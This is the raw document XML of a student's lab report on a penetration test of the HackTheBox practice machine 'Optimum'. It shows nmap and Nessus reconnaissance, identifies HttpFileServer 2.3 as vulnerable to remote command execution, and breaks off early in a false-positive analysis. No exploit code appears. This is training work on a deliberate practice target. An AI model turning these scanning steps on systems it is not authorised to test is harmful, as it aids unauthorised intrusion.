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1FFB" w14:textId="6132968D" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>Experiment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039074C">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B7311" w14:textId="77777777" w:rsidR="0039074C" w:rsidRDefault="0039074C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4532F2AF" w14:textId="5358A893" w:rsidR="0039074C" w:rsidRDefault="0039074C" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name- </w:t>
      </w:r>
      <w:r w:rsidR="005B15EE">
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AAYUSH SINGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47777D" w14:textId="623BB0A4" w:rsidR="0039074C" w:rsidRPr="0039074C" w:rsidRDefault="0039074C" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="Title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Reg No- RA23110300101</w:t>
      </w:r>
      <w:r w:rsidR="008A6F8A">
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005B15EE">
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CA232" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="358"/>
        <w:ind w:right="144"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>prepare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>analysis,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0E4660"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>false positive analysis, and exploiting vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576732FA" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B805B" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>prepare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27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perform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>analysis,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>positive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>analysis,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 xml:space="preserve">exploiting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1317ED3E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="161" w:line="439" w:lineRule="auto"/>
        <w:ind w:right="7053"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Procedure Scoping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F51042" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="162"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The objective of this assignment is to conduct a Vulnerability Assessment and Penetration Testing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designated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>target,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'Optimum'.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'Optimum'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intentionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>machine provided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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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gain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machine, escalate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>privileges, and compile a comprehensive VAPT report detailing the assessment findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D7850" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="237"/>
        <w:jc w:val="both"/>
      </w:pP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Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D61B6" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="265" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="162"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidR="006D2FCA">
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to learn more about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VPN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boxes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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click on "Join Machine" to access the machine's IP. Upon joining the machine, you will be able to view the IP address of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A7C5B" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="238" w:line="470" w:lineRule="auto"/>
        <w:ind w:left="23" w:right="3114"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/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performing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nmap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scan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target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machine. Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A -T4 &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36387A2B" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA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2FB38D21" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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t>results,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infer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following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1639E5BC" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="262"/>
        <w:ind w:left="23"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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OS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F205C" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:i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0"/>
        <w:gridCol w:w="3010"/>
        <w:gridCol w:w="3010"/>
      </w:tblGrid>
      <w:tr w:rsidR="006D2FCA" w14:paraId="4AEFA719" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F932B4" w14:textId="77777777" w:rsidR="006D2FC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Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B1AEF98" w14:textId="77777777" w:rsidR="006D2FC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Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="436669A5" w14:textId="77777777" w:rsidR="006D2FC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Service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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D2FCA" w14:paraId="621C16E5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66EA40D9" w14:textId="77777777" w:rsidR="006D2FCA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3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C6ABB5" w14:textId="77777777" w:rsidR="006D2FCA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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37B627A8" w14:textId="77777777" w:rsidR="006D2FCA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HttpFileServer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httpd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2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AA7383D" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="163"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>searched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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpFileServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>httpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>2.3’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it’s vulnerable to Remote Command Execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C256F54" w14:textId="6776B64F" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332CA3F6" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="265"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability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529AE1EB" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="265" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="171"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Since we know that a website is running on port 80 on the target machine, we can perform a Nessus Scan on that website to find potential vulnerabilities. First create a New Scan and choose the Web Application Tests scan template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9CE23" w14:textId="41E5E98E" w:rsidR="006D2FCA" w:rsidRDefault="005B15EE" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3DCCCC" wp14:editId="17FD7DB4">
            <wp:extent cx="5853430" cy="3902075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="315302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DF6B" w14:textId="431BD793" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="270"/>
      </w:pPr>
      <w:r>
        <w:t>Enter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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>address.</w:t>
      </w:r>
      <w:r w:rsidR="005B15EE" w:rsidRPr="005B15EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218E962" w14:textId="4AB0EB19" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6443CD" w14:textId="607C30BE" w:rsidR="0039074C" w:rsidRPr="0039074C" w:rsidRDefault="005B15EE" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1766D752" wp14:editId="08ED7065">
            <wp:extent cx="5853430" cy="3902075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="516400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00713" name="Picture 5164007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2275" w14:textId="0DCB0978" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193C8B6B" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="268" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>changed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scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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'Custom'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t>tab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port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scanning.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Set the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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80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"Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scanning" tab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launch the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>until the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C728EF3" w14:textId="5AB7C48A" w:rsidR="0039074C" w:rsidRPr="0039074C" w:rsidRDefault="005B15EE" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FBD838" wp14:editId="062D0A36">
            <wp:extent cx="5853430" cy="3902075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="683095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95606" name="Picture 6830956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4217" w14:textId="074239F4" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719D56DD" w14:textId="775517AF" w:rsidR="006D2FCA" w:rsidRDefault="005B15EE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167A7F0D" wp14:editId="503E6ECA">
            <wp:extent cx="5853430" cy="3902075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="11438520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52018" name="Picture 11438520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5106" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After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finishes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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"Vulnerabilities"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tab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scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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vulnerabilities identified by Nessus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A32D04" w14:textId="48B1D65A" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0702EA7E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="272"/>
      </w:pPr>
      <w:r>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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3FC912C8" w14:textId="74B19BD7" w:rsidR="006D2FCA" w:rsidRPr="0039074C" w:rsidRDefault="00000000" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="265" w:line="259" w:lineRule="auto"/>
        <w:sectPr w:rsidR="006D2FCA" w:rsidRPr="0039074C">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Out of the vulnerabilities identified by Nessus, three medium level vulnerabilities were false positives. The first vulnerability identified was ‘CGI Generic Cookie Injection Scripting’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE24EA3" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tested the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payload provided by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Nessus, but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it didn’t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508AACAB" w14:textId="51FA7FC1" w:rsidR="0039074C" w:rsidRPr="0039074C" w:rsidRDefault="0039074C" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
